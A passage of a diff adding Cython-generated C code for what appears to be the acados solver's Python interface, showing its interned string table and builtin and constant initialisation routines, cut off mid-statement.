{&__pyx_n_s_eval_param_sens, __pyx_k_eval_param_sens, sizeof(__pyx_k_eval_param_sens), 0, 0, 1, 1}, + {&__pyx_n_u_ex, __pyx_k_ex, sizeof(__pyx_k_ex), 0, 1, 0, 1}, + {&__pyx_n_s_exit, __pyx_k_exit, sizeof(__pyx_k_exit), 0, 0, 1, 1}, + {&__pyx_n_s_f, __pyx_k_f, sizeof(__pyx_k_f), 0, 0, 1, 1}, + {&__pyx_n_s_field, __pyx_k_field, sizeof(__pyx_k_field), 0, 0, 1, 1}, + {&__pyx_n_s_field_2, __pyx_k_field_2, sizeof(__pyx_k_field_2), 0, 0, 1, 1}, + {&__pyx_n_s_fields, __pyx_k_fields, sizeof(__pyx_k_fields), 0, 0, 1, 1}, + {&__pyx_n_s_filename, __pyx_k_filename, sizeof(__pyx_k_filename), 0, 0, 1, 1}, + {&__pyx_n_s_flags, __pyx_k_flags, sizeof(__pyx_k_flags), 0, 0, 1, 1}, + {&__pyx_n_s_float64, __pyx_k_float64, sizeof(__pyx_k_float64), 0, 0, 1, 1}, + {&__pyx_kp_u_for_field, __pyx_k_for_field, sizeof(__pyx_k_for_field), 0, 1, 0, 0}, + {&__pyx_n_s_format, __pyx_k_format, sizeof(__pyx_k_format), 0, 0, 1, 1}, + {&__pyx_n_s_fortran, __pyx_k_fortran, sizeof(__pyx_k_fortran), 0, 0, 1, 1}, + {&__pyx_n_u_fortran, __pyx_k_fortran, sizeof(__pyx_k_fortran), 0, 1, 0, 1}, + {&__pyx_n_s_full_stats, __pyx_k_full_stats, sizeof(__pyx_k_full_stats), 0, 0, 1, 1}, + {&__pyx_n_u_full_step_dual, __pyx_k_full_step_dual, sizeof(__pyx_k_full_step_dual), 0, 1, 0, 1}, + {&__pyx_kp_u_gc, __pyx_k_gc, sizeof(__pyx_k_gc), 0, 1, 0, 0}, + {&__pyx_n_s_get, __pyx_k_get, sizeof(__pyx_k_get), 0, 0, 1, 1}, + {&__pyx_n_s_get_cost, __pyx_k_get_cost, sizeof(__pyx_k_get_cost), 0, 0, 1, 1}, + {&__pyx_n_s_get_pointers_solver, __pyx_k_get_pointers_solver, sizeof(__pyx_k_get_pointers_solver), 0, 0, 1, 1}, + {&__pyx_n_s_get_residuals, __pyx_k_get_residuals, sizeof(__pyx_k_get_residuals), 0, 0, 1, 1}, + {&__pyx_n_s_get_stat_double, __pyx_k_get_stat_double, sizeof(__pyx_k_get_stat_double), 0, 0, 1, 1}, + {&__pyx_n_s_get_stat_int, __pyx_k_get_stat_int, sizeof(__pyx_k_get_stat_int), 0, 0, 1, 1}, + {&__pyx_n_s_get_stat_matrix, __pyx_k_get_stat_matrix, sizeof(__pyx_k_get_stat_matrix), 0, 0, 1, 1}, + {&__pyx_n_s_get_stats, __pyx_k_get_stats, sizeof(__pyx_k_get_stats), 0, 0, 1, 1}, + {&__pyx_n_s_getcwd, __pyx_k_getcwd, sizeof(__pyx_k_getcwd), 0, 0, 1, 1}, + {&__pyx_n_s_getstate, __pyx_k_getstate, sizeof(__pyx_k_getstate), 0, 0, 1, 1}, + {&__pyx_n_u_globalization, __pyx_k_globalization, sizeof(__pyx_k_globalization), 0, 1, 0, 1}, + {&__pyx_n_u_globalization_use_SOC, __pyx_k_globalization_use_SOC, sizeof(__pyx_k_globalization_use_SOC), 0, 1, 0, 1}, + {&__pyx_kp_u_got, __pyx_k_got, sizeof(__pyx_k_got), 0, 1, 0, 0}, + {&__pyx_kp_u_got_differing_extents_in_dimensi, __pyx_k_got_differing_extents_in_dimensi, sizeof(__pyx_k_got_differing_extents_in_dimensi), 0, 1, 0, 0}, + {&__pyx_n_s_i, __pyx_k_i, sizeof(__pyx_k_i), 0, 0, 1, 1}, + {&__pyx_n_s_id, __pyx_k_id, sizeof(__pyx_k_id), 0, 0, 1, 1}, + {&__pyx_n_s_import, __pyx_k_import, sizeof(__pyx_k_import), 0, 0, 1, 1}, + {&__pyx_n_s_indent, __pyx_k_indent, sizeof(__pyx_k_indent), 0, 0, 1, 1}, + {&__pyx_n_s_index, __pyx_k_index, sizeof(__pyx_k_index), 0, 0, 1, 1}, + {&__pyx_n_u_initialize_t_slacks, __pyx_k_initialize_t_slacks, sizeof(__pyx_k_initialize_t_slacks), 0, 1, 0, 1}, + {&__pyx_n_s_initializing, __pyx_k_initializing, sizeof(__pyx_k_initializing), 0, 0, 1, 1}, + {&__pyx_n_s_int, __pyx_k_int, sizeof(__pyx_k_int), 0, 0, 1, 1}, + {&__pyx_n_s_int_fields, __pyx_k_int_fields, sizeof(__pyx_k_int_fields), 0, 0, 1, 1}, + {&__pyx_n_s_int_value, __pyx_k_int_value, sizeof(__pyx_k_int_value), 0, 0, 1, 1}, + {&__pyx_n_s_is_coroutine, __pyx_k_is_coroutine, sizeof(__pyx_k_is_coroutine), 0, 0, 1, 1}, + {&__pyx_kp_u_isenabled, __pyx_k_isenabled, sizeof(__pyx_k_isenabled), 0, 1, 0, 0}, + {&__pyx_n_s_isfile, __pyx_k_isfile, sizeof(__pyx_k_isfile), 0, 0, 1, 1}, + {&__pyx_n_s_itemsize, __pyx_k_itemsize, sizeof(__pyx_k_itemsize), 0, 0, 1, 1}, + {&__pyx_kp_s_itemsize_0_for_cython_array, __pyx_k_itemsize_0_for_cython_array, sizeof(__pyx_k_itemsize_0_for_cython_array), 0, 0, 1, 0}, + {&__pyx_n_u_iterate, __pyx_k_iterate, sizeof(__pyx_k_iterate), 0, 1, 0, 1}, + {&__pyx_n_s_join, __pyx_k_join, sizeof(__pyx_k_join), 0, 0, 1, 1}, + {&__pyx_n_s_json, __pyx_k_json, sizeof(__pyx_k_json), 0, 0, 1, 1}, + {&__pyx_kp_u_json_2, __pyx_k_json_2, sizeof(__pyx_k_json_2), 0, 1, 0, 0}, + {&__pyx_n_s_key, __pyx_k_key, sizeof(__pyx_k_key), 0, 0, 1, 1}, + {&__pyx_n_s_keys, __pyx_k_keys, sizeof(__pyx_k_keys), 0, 0, 1, 1}, + {&__pyx_n_u_lam, __pyx_k_lam, sizeof(__pyx_k_lam), 0, 1, 0, 1}, + {&__pyx_n_u_lam_2, __pyx_k_lam_2, sizeof(__pyx_k_lam_2), 0, 1, 0, 1}, + {&__pyx_n_u_lbu, __pyx_k_lbu, sizeof(__pyx_k_lbu), 0, 1, 0, 1}, + {&__pyx_n_u_lbx, __pyx_k_lbx, sizeof(__pyx_k_lbx), 0, 1, 0, 1}, + {&__pyx_n_u_line_search_use_sufficient_desce, __pyx_k_line_search_use_sufficient_desce, sizeof(__pyx_k_line_search_use_sufficient_desce), 0, 1, 0, 1}, + {&__pyx_n_s_load, __pyx_k_load, sizeof(__pyx_k_load), 0, 0, 1, 1}, + {&__pyx_n_s_load_iterate, __pyx_k_load_iterate, sizeof(__pyx_k_load_iterate), 0, 0, 1, 1}, + {&__pyx_kp_u_load_iterate_failed_file_does_no, __pyx_k_load_iterate_failed_file_does_no, sizeof(__pyx_k_load_iterate_failed_file_does_no), 0, 1, 0, 0}, + {&__pyx_n_s_m, __pyx_k_m, sizeof(__pyx_k_m), 0, 0, 1, 1}, + {&__pyx_n_s_main, __pyx_k_main, sizeof(__pyx_k_main), 0, 0, 1, 1}, + {&__pyx_n_s_mem_fields, __pyx_k_mem_fields, sizeof(__pyx_k_mem_fields), 0, 0, 1, 1}, + {&__pyx_n_s_memview, __pyx_k_memview, sizeof(__pyx_k_memview), 0, 0, 1, 1}, + {&__pyx_n_s_min_size, __pyx_k_min_size, sizeof(__pyx_k_min_size), 0, 0, 1, 1}, + {&__pyx_n_s_mode, __pyx_k_mode, sizeof(__pyx_k_mode), 0, 0, 1, 1}, + {&__pyx_n_s_model_name, __pyx_k_model_name, sizeof(__pyx_k_model_name), 0, 0, 1, 1}, + {&__pyx_n_s_msg, __pyx_k_msg, sizeof(__pyx_k_msg), 0, 0, 1, 1}, + {&__pyx_n_s_n, __pyx_k_n, sizeof(__pyx_k_n), 0, 0, 1, 1}, + {&__pyx_n_s_name, __pyx_k_name, sizeof(__pyx_k_name), 0, 0, 1, 1}, + {&__pyx_n_s_name_2, __pyx_k_name_2, sizeof(__pyx_k_name_2), 0, 0, 1, 1}, + {&__pyx_n_s_ndim, __pyx_k_ndim, sizeof(__pyx_k_ndim), 0, 0, 1, 1}, + {&__pyx_n_s_new, __pyx_k_new, sizeof(__pyx_k_new), 0, 0, 1, 1}, + {&__pyx_n_s_new_time_steps, __pyx_k_new_time_steps, sizeof(__pyx_k_new_time_steps), 0, 0, 1, 1}, + {&__pyx_n_s_nlp_solver_type, __pyx_k_nlp_solver_type, sizeof(__pyx_k_nlp_solver_type), 0, 0, 1, 1}, + {&__pyx_kp_s_no_default___reduce___due_to_non, __pyx_k_no_default___reduce___due_to_non, sizeof(__pyx_k_no_default___reduce___due_to_non), 0, 0, 1, 0}, + {&__pyx_n_s_np, __pyx_k_np, sizeof(__pyx_k_np), 0, 0, 1, 1}, + {&__pyx_n_s_numpy, __pyx_k_numpy, sizeof(__pyx_k_numpy), 0, 0, 1, 1}, + {&__pyx_kp_u_numpy_core_multiarray_failed_to, __pyx_k_numpy_core_multiarray_failed_to, sizeof(__pyx_k_numpy_core_multiarray_failed_to), 0, 1, 0, 0}, + {&__pyx_kp_u_numpy_core_umath_failed_to_impor, __pyx_k_numpy_core_umath_failed_to_impor, sizeof(__pyx_k_numpy_core_umath_failed_to_impor), 0, 1, 0, 0}, + {&__pyx_n_s_nx, __pyx_k_nx, sizeof(__pyx_k_nx), 0, 0, 1, 1}, + {&__pyx_n_s_obj, __pyx_k_obj, sizeof(__pyx_k_obj), 0, 0, 1, 1}, + {&__pyx_n_s_open, __pyx_k_open, sizeof(__pyx_k_open), 0, 0, 1, 1}, + {&__pyx_n_s_options_set, __pyx_k_options_set, sizeof(__pyx_k_options_set), 0, 0, 1, 1}, + {&__pyx_n_s_order, __pyx_k_order, sizeof(__pyx_k_order), 0, 0, 1, 1}, + {&__pyx_n_s_os, __pyx_k_os, sizeof(__pyx_k_os), 0, 0, 1, 1}, + {&__pyx_n_s_out, __pyx_k_out, sizeof(__pyx_k_out), 0, 0, 1, 1}, + {&__pyx_n_s_out_fields, __pyx_k_out_fields, sizeof(__pyx_k_out_fields), 0, 0, 1, 1}, + {&__pyx_n_s_out_mat, __pyx_k_out_mat, sizeof(__pyx_k_out_mat), 0, 0, 1, 1}, + {&__pyx_n_s_overwrite, __pyx_k_overwrite, sizeof(__pyx_k_overwrite), 0, 0, 1, 1}, + {&__pyx_n_u_p, __pyx_k_p, sizeof(__pyx_k_p), 0, 1, 0, 1}, + {&__pyx_n_s_pack, __pyx_k_pack, sizeof(__pyx_k_pack), 0, 0, 1, 1}, + {&__pyx_n_s_path, __pyx_k_path, sizeof(__pyx_k_path), 0, 0, 1, 1}, + {&__pyx_n_u_pi, __pyx_k_pi, sizeof(__pyx_k_pi), 0, 1, 0, 1}, + {&__pyx_n_u_pi_2, __pyx_k_pi_2, sizeof(__pyx_k_pi_2), 0, 1, 0, 1}, + {&__pyx_n_s_pickle, __pyx_k_pickle, sizeof(__pyx_k_pickle), 0, 0, 1, 1}, + {&__pyx_n_s_print, __pyx_k_print, sizeof(__pyx_k_print), 0, 0, 1, 1}, + {&__pyx_n_u_print_level, __pyx_k_print_level, sizeof(__pyx_k_print_level), 0, 1, 0, 1}, + {&__pyx_n_s_print_statistics, __pyx_k_print_statistics, sizeof(__pyx_k_print_statistics), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_PickleError, __pyx_k_pyx_PickleError, sizeof(__pyx_k_pyx_PickleError), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_checksum, __pyx_k_pyx_checksum, sizeof(__pyx_k_pyx_checksum), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_result, __pyx_k_pyx_result, sizeof(__pyx_k_pyx_result), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_state, __pyx_k_pyx_state, sizeof(__pyx_k_pyx_state), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_type, __pyx_k_pyx_type, sizeof(__pyx_k_pyx_type), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_unpickle_Enum, __pyx_k_pyx_unpickle_Enum, sizeof(__pyx_k_pyx_unpickle_Enum), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_vtable, __pyx_k_pyx_vtable, sizeof(__pyx_k_pyx_vtable), 0, 0, 1, 1}, + {&__pyx_n_u_qp_iter, __pyx_k_qp_iter, sizeof(__pyx_k_qp_iter), 0, 1, 0, 1}, + {&__pyx_n_u_qp_mu0, __pyx_k_qp_mu0, sizeof(__pyx_k_qp_mu0), 0, 1, 0, 1}, + {&__pyx_n_s_qp_solver_cond_N, __pyx_k_qp_solver_cond_N, sizeof(__pyx_k_qp_solver_cond_N), 0, 0, 1, 1}, + {&__pyx_n_u_qp_tau_min, __pyx_k_qp_tau_min, sizeof(__pyx_k_qp_tau_min), 0, 1, 0, 1}, + {&__pyx_n_u_qp_tol_comp, __pyx_k_qp_tol_comp, sizeof(__pyx_k_qp_tol_comp), 0, 1, 0, 1}, + {&__pyx_n_u_qp_tol_eq, __pyx_k_qp_tol_eq, sizeof(__pyx_k_qp_tol_eq), 0, 1, 0, 1}, + {&__pyx_n_u_qp_tol_ineq, __pyx_k_qp_tol_ineq, sizeof(__pyx_k_qp_tol_ineq), 0, 1, 0, 1}, + {&__pyx_n_u_qp_tol_stat, __pyx_k_qp_tol_stat, sizeof(__pyx_k_qp_tol_stat), 0, 1, 0, 1}, + {&__pyx_n_u_qp_warm_start, __pyx_k_qp_warm_start, sizeof(__pyx_k_qp_warm_start), 0, 1, 0, 1}, + {&__pyx_n_u_r, __pyx_k_r, sizeof(__pyx_k_r), 0, 1, 0, 1}, + {&__pyx_n_s_range, __pyx_k_range, sizeof(__pyx_k_range), 0, 0, 1, 1}, + {&__pyx_n_s_recompute, __pyx_k_recompute, sizeof(__pyx_k_recompute), 0, 0, 1, 1}, + {&__pyx_n_s_reduce, __pyx_k_reduce, sizeof(__pyx_k_reduce), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_cython, __pyx_k_reduce_cython, sizeof(__pyx_k_reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_ex, __pyx_k_reduce_ex, sizeof(__pyx_k_reduce_ex), 0, 0, 1, 1}, + {&__pyx_n_s_register, __pyx_k_register, sizeof(__pyx_k_register), 0, 0, 1, 1}, + {&__pyx_n_b_res_comp, __pyx_k_res_comp, sizeof(__pyx_k_res_comp), 0, 0, 0, 1}, + {&__pyx_n_b_res_eq, __pyx_k_res_eq, sizeof(__pyx_k_res_eq), 0, 0, 0, 1}, + {&__pyx_n_b_res_ineq, __pyx_k_res_ineq, sizeof(__pyx_k_res_ineq), 0, 0, 0, 1}, + {&__pyx_n_b_res_stat, __pyx_k_res_stat, sizeof(__pyx_k_res_stat), 0, 0, 0, 1}, + {&__pyx_n_s_reset, __pyx_k_reset, sizeof(__pyx_k_reset), 0, 0, 1, 1}, + {&__pyx_n_u_residuals, __pyx_k_residuals, sizeof(__pyx_k_residuals), 0, 1, 0, 1}, + {&__pyx_n_u_rti_phase, __pyx_k_rti_phase, sizeof(__pyx_k_rti_phase), 0, 1, 0, 1}, + {&__pyx_n_s_self, __pyx_k_self, sizeof(__pyx_k_self), 0, 0, 1, 1}, + {&__pyx_n_s_set, __pyx_k_set, sizeof(__pyx_k_set), 0, 0, 1, 1}, + {&__pyx_n_s_set_new_time_steps, __pyx_k_set_new_time_steps, sizeof(__pyx_k_set_new_time_steps), 0, 0, 1, 1}, + {&__pyx_n_s_setstate, __pyx_k_setstate, sizeof(__pyx_k_setstate), 0, 0, 1, 1}, + {&__pyx_n_s_setstate_cython, __pyx_k_setstate_cython, sizeof(__pyx_k_setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_shape, __pyx_k_shape, sizeof(__pyx_k_shape), 0, 0, 1, 1}, + {&__pyx_n_s_size, __pyx_k_size, sizeof(__pyx_k_size), 0, 0, 1, 1}, + {&__pyx_n_u_sl, __pyx_k_sl, sizeof(__pyx_k_sl), 0, 1, 0, 1}, + {&__pyx_n_u_sl_2, __pyx_k_sl_2, sizeof(__pyx_k_sl_2), 0, 1, 0, 1}, + {&__pyx_n_s_solution, __pyx_k_solution, sizeof(__pyx_k_solution), 0, 0, 1, 1}, + {&__pyx_n_s_solve, __pyx_k_solve, sizeof(__pyx_k_solve), 0, 0, 1, 1}, + {&__pyx_kp_u_solver_option_must_be_of_type_fl, __pyx_k_solver_option_must_be_of_type_fl, sizeof(__pyx_k_solver_option_must_be_of_type_fl), 0, 1, 0, 0}, + {&__pyx_kp_u_solver_option_must_be_of_type_in, __pyx_k_solver_option_must_be_of_type_in, sizeof(__pyx_k_solver_option_must_be_of_type_in), 0, 1, 0, 0}, + {&__pyx_kp_u_solver_option_must_be_of_type_st, __pyx_k_solver_option_must_be_of_type_st, sizeof(__pyx_k_solver_option_must_be_of_type_st), 0, 1, 0, 0}, + {&__pyx_n_s_sort_keys, __pyx_k_sort_keys, sizeof(__pyx_k_sort_keys), 0, 0, 1, 1}, + {&__pyx_n_s_spec, __pyx_k_spec, sizeof(__pyx_k_spec), 0, 0, 1, 1}, + {&__pyx_n_s_split, __pyx_k_split, sizeof(__pyx_k_split), 0, 0, 1, 1}, + {&__pyx_n_s_sqp_iter, __pyx_k_sqp_iter, sizeof(__pyx_k_sqp_iter), 0, 0, 1, 1}, + {&__pyx_n_u_sqp_iter, __pyx_k_sqp_iter, sizeof(__pyx_k_sqp_iter), 0, 1, 0, 1}, + {&__pyx_n_s_stage, __pyx_k_stage, sizeof(__pyx_k_stage), 0, 0, 1, 1}, + {&__pyx_n_s_start, __pyx_k_start, sizeof(__pyx_k_start), 0, 0, 1, 1}, + {&__pyx_n_s_stat_m, __pyx_k_stat_m, sizeof(__pyx_k_stat_m), 0, 0, 1, 1}, + {&__pyx_n_u_stat_m, __pyx_k_stat_m, sizeof(__pyx_k_stat_m), 0, 1, 0, 1}, + {&__pyx_n_s_stat_n, __pyx_k_stat_n, sizeof(__pyx_k_stat_n), 0, 0, 1, 1}, + {&__pyx_n_u_stat_n, __pyx_k_stat_n, sizeof(__pyx_k_stat_n), 0, 1, 0, 1}, + {&__pyx_n_u_statistics, __pyx_k_statistics, sizeof(__pyx_k_statistics), 0, 1, 0, 1}, + {&__pyx_n_s_step, __pyx_k_step, sizeof(__pyx_k_step), 0, 0, 1, 1}, + {&__pyx_n_u_step_length, __pyx_k_step_length, sizeof(__pyx_k_step_length), 0, 1, 0, 1}, + {&__pyx_n_s_stop, __pyx_k_stop, sizeof(__pyx_k_stop), 0, 0, 1, 1}, + {&__pyx_n_s_store_iterate, __pyx_k_store_iterate, sizeof(__pyx_k_store_iterate), 0, 0, 1, 1}, + {&__pyx_n_s_store_iterate_locals_lambda, __pyx_k_store_iterate_locals_lambda, sizeof(__pyx_k_store_iterate_locals_lambda), 0, 0, 1, 1}, + {&__pyx_kp_u_stored_current_iterate_in, __pyx_k_stored_current_iterate_in, sizeof(__pyx_k_stored_current_iterate_in), 0, 1, 0, 0}, + {&__pyx_n_s_strftime, __pyx_k_strftime, sizeof(__pyx_k_strftime), 0, 0, 1, 1}, + {&__pyx_kp_s_strided_and_direct, __pyx_k_strided_and_direct, sizeof(__pyx_k_strided_and_direct), 0, 0, 1, 0}, + {&__pyx_kp_s_strided_and_direct_or_indirect, __pyx_k_strided_and_direct_or_indirect, sizeof(__pyx_k_strided_and_direct_or_indirect), 0, 0, 1, 0}, + {&__pyx_kp_s_strided_and_indirect, __pyx_k_strided_and_indirect, sizeof(__pyx_k_strided_and_indirect), 0, 0, 1, 0}, + {&__pyx_n_s_string_fields, __pyx_k_string_fields, sizeof(__pyx_k_string_fields), 0, 0, 1, 1}, + {&__pyx_n_s_string_value, __pyx_k_string_value, sizeof(__pyx_k_string_value), 0, 0, 1, 1}, + {&__pyx_kp_s_stringsource, __pyx_k_stringsource, sizeof(__pyx_k_stringsource), 0, 0, 1, 0}, + {&__pyx_n_s_struct, __pyx_k_struct, sizeof(__pyx_k_struct), 0, 0, 1, 1}, + {&__pyx_n_u_su, __pyx_k_su, sizeof(__pyx_k_su), 0, 1, 0, 1}, + {&__pyx_n_u_su_2, __pyx_k_su_2, sizeof(__pyx_k_su_2), 0, 1, 0, 1}, + {&__pyx_n_s_sys, __pyx_k_sys, sizeof(__pyx_k_sys), 0, 0, 1, 1}, + {&__pyx_n_u_t, __pyx_k_t, sizeof(__pyx_k_t), 0, 1, 0, 1}, + {&__pyx_n_u_t_2, __pyx_k_t_2, sizeof(__pyx_k_t_2), 0, 1, 0, 1}, + {&__pyx_n_s_test, __pyx_k_test, sizeof(__pyx_k_test), 0, 0, 1, 1}, + {&__pyx_kp_s_third_party_acados_acados_templa, __pyx_k_third_party_acados_acados_templa, sizeof(__pyx_k_third_party_acados_acados_templa), 0, 0, 1, 0}, + {&__pyx_n_u_time_glob, __pyx_k_time_glob, sizeof(__pyx_k_time_glob), 0, 1, 0, 1}, + {&__pyx_n_u_time_lin, __pyx_k_time_lin, sizeof(__pyx_k_time_lin), 0, 1, 0, 1}, + {&__pyx_n_u_time_qp, __pyx_k_time_qp, sizeof(__pyx_k_time_qp), 0, 1, 0, 1}, + {&__pyx_n_u_time_qp_solver_call, __pyx_k_time_qp_solver_call, sizeof(__pyx_k_time_qp_solver_call), 0, 1, 0, 1}, + {&__pyx_n_u_time_qp_xcond, __pyx_k_time_qp_xcond, sizeof(__pyx_k_time_qp_xcond), 0, 1, 0, 1}, + {&__pyx_n_u_time_reg, __pyx_k_time_reg, sizeof(__pyx_k_time_reg), 0, 1, 0, 1}, + {&__pyx_n_u_time_sim, __pyx_k_time_sim, sizeof(__pyx_k_time_sim), 0, 1, 0, 1}, + {&__pyx_n_u_time_sim_ad, __pyx_k_time_sim_ad, sizeof(__pyx_k_time_sim_ad), 0, 1, 0, 1}, + {&__pyx_n_u_time_sim_la, __pyx_k_time_sim_la, sizeof(__pyx_k_time_sim_la), 0, 1, 0, 1}, + {&__pyx_n_u_time_solution_sensitivities, __pyx_k_time_solution_sensitivities, sizeof(__pyx_k_time_solution_sensitivities), 0, 1, 0, 1}, + {&__pyx_n_u_time_tot, __pyx_k_time_tot, sizeof(__pyx_k_time_tot), 0, 1, 0, 1}, + {&__pyx_n_u_tol_comp, __pyx_k_tol_comp, sizeof(__pyx_k_tol_comp), 0, 1, 0, 1}, + {&__pyx_n_u_tol_eq, __pyx_k_tol_eq, sizeof(__pyx_k_tol_eq), 0, 1, 0, 1}, + {&__pyx_n_u_tol_ineq, __pyx_k_tol_ineq, sizeof(__pyx_k_tol_ineq), 0, 1, 0, 1}, + {&__pyx_n_u_tol_stat, __pyx_k_tol_stat, sizeof(__pyx_k_tol_stat), 0, 1, 0, 1}, + {&__pyx_n_s_tolist, __pyx_k_tolist, sizeof(__pyx_k_tolist), 0, 0, 1, 1}, + {&__pyx_n_u_u, __pyx_k_u, sizeof(__pyx_k_u), 0, 1, 0, 1}, + {&__pyx_n_u_u_2, __pyx_k_u_2, sizeof(__pyx_k_u_2), 0, 1, 0, 1}, + {&__pyx_n_u_ubu, __pyx_k_ubu, sizeof(__pyx_k_ubu), 0, 1, 0, 1}, + {&__pyx_n_u_ubx, __pyx_k_ubx, sizeof(__pyx_k_ubx), 0, 1, 0, 1}, + {&__pyx_kp_s_unable_to_allocate_array_data, __pyx_k_unable_to_allocate_array_data, sizeof(__pyx_k_unable_to_allocate_array_data), 0, 0, 1, 0}, + {&__pyx_kp_s_unable_to_allocate_shape_and_str, __pyx_k_unable_to_allocate_shape_and_str, sizeof(__pyx_k_unable_to_allocate_shape_and_str), 0, 0, 1, 0}, + {&__pyx_n_s_unpack, __pyx_k_unpack, sizeof(__pyx_k_unpack), 0, 0, 1, 1}, + {&__pyx_n_s_update, __pyx_k_update, sizeof(__pyx_k_update), 0, 0, 1, 1}, + {&__pyx_n_s_update_qp_solver_cond_N, __pyx_k_update_qp_solver_cond_N, sizeof(__pyx_k_update_qp_solver_cond_N), 0, 0, 1, 1}, + {&__pyx_n_s_utcnow, __pyx_k_utcnow, sizeof(__pyx_k_utcnow), 0, 0, 1, 1}, + {&__pyx_kp_u_utf_8, __pyx_k_utf_8, sizeof(__pyx_k_utf_8), 0, 1, 0, 0}, + {&__pyx_n_s_value, __pyx_k_value, sizeof(__pyx_k_value), 0, 0, 1, 1}, + {&__pyx_n_s_value_2, __pyx_k_value_2, sizeof(__pyx_k_value_2), 0, 0, 1, 1}, + {&__pyx_n_s_value_shape, __pyx_k_value_shape, sizeof(__pyx_k_value_shape), 0, 0, 1, 1}, + {&__pyx_n_s_version_info, __pyx_k_version_info, sizeof(__pyx_k_version_info), 0, 0, 1, 1}, + {&__pyx_n_u_w, __pyx_k_w, sizeof(__pyx_k_w), 0, 1, 0, 1}, + {&__pyx_n_u_warm_start_first_qp, __pyx_k_warm_start_first_qp, sizeof(__pyx_k_warm_start_first_qp), 0, 1, 0, 1}, + {&__pyx_kp_u_with_dimension, __pyx_k_with_dimension, sizeof(__pyx_k_with_dimension), 0, 1, 0, 0}, + {&__pyx_kp_u_with_dimension_you_have, __pyx_k_with_dimension_you_have, sizeof(__pyx_k_with_dimension_you_have), 0, 1, 0, 0}, + {&__pyx_n_b_x, __pyx_k_x, sizeof(__pyx_k_x), 0, 0, 0, 1}, + {&__pyx_n_s_x, __pyx_k_x, sizeof(__pyx_k_x), 0, 0, 1, 1}, + {&__pyx_n_u_x, __pyx_k_x, sizeof(__pyx_k_x), 0, 1, 0, 1}, + {&__pyx_n_u_x_2, __pyx_k_x_2, sizeof(__pyx_k_x_2), 0, 1, 0, 1}, + {&__pyx_n_u_xdot_guess, __pyx_k_xdot_guess, sizeof(__pyx_k_xdot_guess), 0, 1, 0, 1}, + {&__pyx_n_u_y_ref, __pyx_k_y_ref, sizeof(__pyx_k_y_ref), 0, 1, 0, 1}, + {&__pyx_kp_u_you_have, __pyx_k_you_have, sizeof(__pyx_k_you_have), 0, 1, 0, 0}, + {&__pyx_n_u_yref, __pyx_k_yref, sizeof(__pyx_k_yref), 0, 1, 0, 1}, + {&__pyx_n_u_z, __pyx_k_z, sizeof(__pyx_k_z), 0, 1, 0, 1}, + {&__pyx_n_u_z_2, __pyx_k_z_2, sizeof(__pyx_k_z_2), 0, 1, 0, 1}, + {&__pyx_n_u_z_guess, __pyx_k_z_guess, sizeof(__pyx_k_z_guess), 0, 1, 0, 1}, + {&__pyx_n_s_zeros, __pyx_k_zeros, sizeof(__pyx_k_zeros), 0, 0, 1, 1}, + {0, 0, 0, 0, 0, 0, 0} + }; + return __Pyx_InitStrings(__pyx_string_tab); +} +/* #### Code section: cached_builtins ### */ +static CYTHON_SMALL_CODE int __Pyx_InitCachedBuiltins(void) { + __pyx_builtin_AssertionError = __Pyx_GetBuiltinName(__pyx_n_s_AssertionError); if (!__pyx_builtin_AssertionError) __PYX_ERR(0, 86, __pyx_L1_error) + __pyx_builtin_NotImplementedError = __Pyx_GetBuiltinName(__pyx_n_s_NotImplementedError); if (!__pyx_builtin_NotImplementedError) __PYX_ERR(0, 134, __pyx_L1_error) + __pyx_builtin_range = __Pyx_GetBuiltinName(__pyx_n_s_range); if (!__pyx_builtin_range) __PYX_ERR(0, 313, __pyx_L1_error) + __pyx_builtin_open = __Pyx_GetBuiltinName(__pyx_n_s_open); if (!__pyx_builtin_open) __PYX_ERR(0, 325, __pyx_L1_error) + __pyx_builtin_print = __Pyx_GetBuiltinName(__pyx_n_s_print); if (!__pyx_builtin_print) __PYX_ERR(0, 327, __pyx_L1_error) + __pyx_builtin_TypeError = __Pyx_GetBuiltinName(__pyx_n_s_TypeError); if (!__pyx_builtin_TypeError) __PYX_ERR(1, 2, __pyx_L1_error) + __pyx_builtin___import__ = __Pyx_GetBuiltinName(__pyx_n_s_import); if (!__pyx_builtin___import__) __PYX_ERR(1, 100, __pyx_L1_error) + __pyx_builtin_ValueError = __Pyx_GetBuiltinName(__pyx_n_s_ValueError); if (!__pyx_builtin_ValueError) __PYX_ERR(1, 141, __pyx_L1_error) + __pyx_builtin_MemoryError = __Pyx_GetBuiltinName(__pyx_n_s_MemoryError); if (!__pyx_builtin_MemoryError) __PYX_ERR(1, 156, __pyx_L1_error) + __pyx_builtin_enumerate = __Pyx_GetBuiltinName(__pyx_n_s_enumerate); if (!__pyx_builtin_enumerate) __PYX_ERR(1, 159, __pyx_L1_error) + __pyx_builtin_Ellipsis = __Pyx_GetBuiltinName(__pyx_n_s_Ellipsis); if (!__pyx_builtin_Ellipsis) __PYX_ERR(1, 408, __pyx_L1_error) + __pyx_builtin_id = __Pyx_GetBuiltinName(__pyx_n_s_id); if (!__pyx_builtin_id) __PYX_ERR(1, 618, __pyx_L1_error) + __pyx_builtin_IndexError = __Pyx_GetBuiltinName(__pyx_n_s_IndexError); if (!__pyx_builtin_IndexError) __PYX_ERR(1, 914, __pyx_L1_error) + __pyx_builtin_ImportError = __Pyx_GetBuiltinName(__pyx_n_s_ImportError); if (!__pyx_builtin_ImportError) __PYX_ERR(2, 986, __pyx_L1_error) + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: cached_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitCachedConstants(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_InitCachedConstants", 0); + + /* "View.MemoryView":582 + * def suboffsets(self): + * if self.view.suboffsets == NULL: + * return (-1,) * self.view.ndim # <<<<<<<<<<<<<< + * + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) + */ + __pyx_tuple__4 = PyTuple_New(1); if (unlikely(!__pyx_tuple__4)) __PYX_ERR(1, 582, __pyx_L1_error) + 